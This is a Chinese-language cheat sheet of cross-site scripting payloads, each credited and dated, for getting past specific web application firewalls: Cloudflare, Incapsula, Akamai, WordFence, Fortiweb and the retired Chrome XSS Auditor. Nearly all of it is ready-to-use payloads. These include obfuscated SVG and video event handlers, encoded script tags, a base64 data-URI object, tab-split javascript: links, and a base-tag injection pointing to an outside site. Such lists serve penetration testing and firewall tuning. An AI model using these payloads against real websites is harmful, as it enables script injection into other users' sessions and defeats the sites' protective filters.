常见的 WAF 绕过 (Common WAF Bypass)
WAF(Web 应用程序防火墙)旨在通过检查传入和传出流量中是否存在攻击指示模式来过滤掉恶意内容。尽管 WAF 技术非常先进,但由于攻击者使用各种方法对载荷进行混淆和改进以规避检测,WAF 往往难以跟上技术演进的步伐。
摘要 (Summary)
Cloudflare
-
2021年1月25日 - @Bohdan Korzhynskyi
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
-
2020年4月21日 - @Bohdan Korzhynskyi
<svg/OnLoad="`${prompt``}`">
-
2019年8月22日 - @Bohdan Korzhynskyi
<svg/onload=%26nbsp;alert`bohdan`+
-
2019年6月5日 - @Bohdan Korzhynskyi
1'"><img/src/onerror=.1|alert``>
-
2019年6月3日 - @Bohdan Korzhynskyi
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
-
2019年3月22日 - @RakeshMane10
<svg/onload=alert()//
-
2018年2月27日
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
Chrome Auditor
注意:Chrome Auditor 已被弃用,并在最新版本的 Chrome 和 Chromium 浏览器中被移除。
-
2018年8月9日
</script><svg><script>alert(1)-%26apos%3B
Incapsula WAF
-
2019年5月11日 - @daveysec
<svg onload\r\n=$.globalEval("al"+"ert()");>
-
2018年3月8日 - @Alra3ees
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
-
2018年9月11日 - @c0d3G33k
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
Akamai WAF
-
2018年6月18日 - @zseano
?"></script><base%20c%3D=href%3Dhttps:\mysite>
-
2018年10月28日 - @s0md3v
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
WordFence WAF
-
2018年9月12日 - @brutelogic
<a href=javascript:alert(1)>
Fortiweb WAF
-
2019年7月9日 - @rezaduty
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e